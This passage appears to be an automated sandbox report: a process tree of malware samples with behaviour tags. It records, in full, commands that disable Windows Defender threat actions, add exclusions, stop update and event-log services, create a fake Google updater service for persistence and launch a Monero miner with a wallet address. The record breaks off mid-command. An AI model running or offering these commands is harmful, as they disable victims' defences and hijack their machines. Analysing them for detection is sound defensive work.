C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"9⤵PID:2016
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes10⤵
- Modifies Windows Firewall
PID:896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
- Command and Scripting Interpreter: PowerShell
PID:4296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
- Command and Scripting Interpreter: PowerShell
PID:2144 -
C:\Users\Admin\Pictures\Z7d7LfFtxylF4EUq49DQKdTJ.exe"C:\Users\Admin\Pictures\Z7d7LfFtxylF4EUq49DQKdTJ.exe"7⤵PID:756
-
C:\Users\Admin\Pictures\1CtNIy7aulcRu6H3PWmYPUm6.exe"C:\Users\Admin\Pictures\1CtNIy7aulcRu6H3PWmYPUm6.exe"7⤵PID:3136
-
C:\Users\Admin\AppData\Local\Temp\7zS9D93.tmp\Install.exe.\Install.exe /tEdidDDf "385118" /S8⤵PID:2480
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵PID:4236
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"10⤵PID:4844
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵PID:4492
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵PID:932
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"10⤵PID:4984
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵PID:4812
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵PID:4388
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"10⤵PID:4260
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵PID:4564
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 612⤵PID:3056
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"10⤵PID:3048
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵PID:1148
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 612⤵PID:3468
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵PID:4636
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵PID:1272
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force12⤵
- Command and Scripting Interpreter: PowerShell
PID:1032 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force13⤵PID:5024
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"9⤵PID:3632
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵PID:1472
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Command and Scripting Interpreter: PowerShell
PID:3952 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵PID:896
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 19:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS9D93.tmp\Install.exe\" it /DszdidvcBR 385118 /S" /V1 /F9⤵
- Creates scheduled task(s)
PID:3012 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"9⤵PID:436
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ10⤵PID:1064
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ11⤵PID:2056
-
C:\Users\Admin\Pictures\jxCHRzy15E8NMUiPeQ1VIYUZ.exe"C:\Users\Admin\Pictures\jxCHRzy15E8NMUiPeQ1VIYUZ.exe"7⤵PID:3380
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force8⤵
- Command and Scripting Interpreter: PowerShell
PID:4260 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart8⤵PID:596
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart9⤵PID:3792
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc8⤵
- Launches sc.exe
PID:1152 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc8⤵
- Launches sc.exe
PID:1064 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv8⤵
- Launches sc.exe
PID:2080 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits8⤵
- Launches sc.exe
PID:1020 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc8⤵
- Launches sc.exe
PID:1892 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 08⤵PID:1240
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 08⤵PID:3508
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 08⤵PID:2176
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 08⤵PID:2208
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"8⤵
- Launches sc.exe
PID:3748 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"8⤵
- Launches sc.exe
PID:4548 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog8⤵
- Launches sc.exe
PID:3952 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"8⤵
- Launches sc.exe
PID:2476 -
C:\Users\Admin\Pictures\AQYC64byVZtuhPOP6oJ29kqw.exe"C:\Users\Admin\Pictures\AQYC64byVZtuhPOP6oJ29kqw.exe"7⤵PID:1312
-
C:\Users\Admin\AppData\Local\Temp\7zSADB0.tmp\Install.exe.\Install.exe /tEdidDDf "385118" /S8⤵PID:1244
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵PID:1064
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"10⤵PID:4036
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵PID:4132
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵PID:4964
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"10⤵PID:2292
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵PID:5108
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵PID:4812
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"10⤵PID:2972
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵PID:740
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 612⤵PID:4808
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"10⤵PID:3916
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵PID:2952
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 612⤵PID:2568
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵PID:5028
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵PID:4760
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force12⤵
- Command and Scripting Interpreter: PowerShell
PID:1532 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force13⤵PID:2964
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"9⤵PID:2532
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵PID:2044
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Command and Scripting Interpreter: PowerShell
PID:2232 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵PID:1784
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 19:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSADB0.tmp\Install.exe\" it /BFjdidvFgi 385118 /S" /V1 /F9⤵
- Creates scheduled task(s)
PID:2532 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"9⤵PID:4492
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ10⤵PID:4640
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ11⤵PID:4684
-
C:\Users\Admin\AppData\Local\Temp\1000014001\20d9aab82e.exe"C:\Users\Admin\AppData\Local\Temp\1000014001\20d9aab82e.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4824 -ip 48241⤵PID:1700
-
C:\Program Files (x86)\GameStabilityService\GameService.exe"C:\Program Files (x86)\GameStabilityService\GameService.exe"1⤵
- Executes dropped EXE
PID:4044 -
C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe"C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe"2⤵
- Executes dropped EXE
PID:3908 -
C:\Windows\Temp\445001.exe"C:\Windows\Temp\445001.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 86Adxfq6AnkKUZNQwBuLMF9HYKxy399q4GoNvX86ddj4DNkHhKaPCWagERDeBPVYSw76hQwZATyV8GAWhX5g2ujETX6AWcp --coin XMR -t 1 --no-color -p x3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3892
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4628
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1136 -ip 11361⤵PID:756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1136 -ip 11361⤵PID:800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1136 -ip 11361⤵PID:1524
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1136 -ip 11361⤵PID:2728
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1136 -ip 11361⤵PID:2232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1136 -ip 11361⤵PID:4656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1136 -ip 11361⤵PID:4900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1136 -ip 11361⤵PID:1868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1136 -ip 11361⤵PID:3492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1136 -ip 11361⤵PID:2092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4708
-
C:\Users\Admin\AppData\Local\Temp\7zS9D93.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS9D93.tmp\Install.exe it /DszdidvcBR 385118 /S1⤵PID:2700
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:4220
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:4440
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:896
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:4236
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:440
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:4312
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:4980
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:3560
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:764
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:656
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:2488
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:3632
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1040
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:3460
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:840
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:2824 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:1672
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD 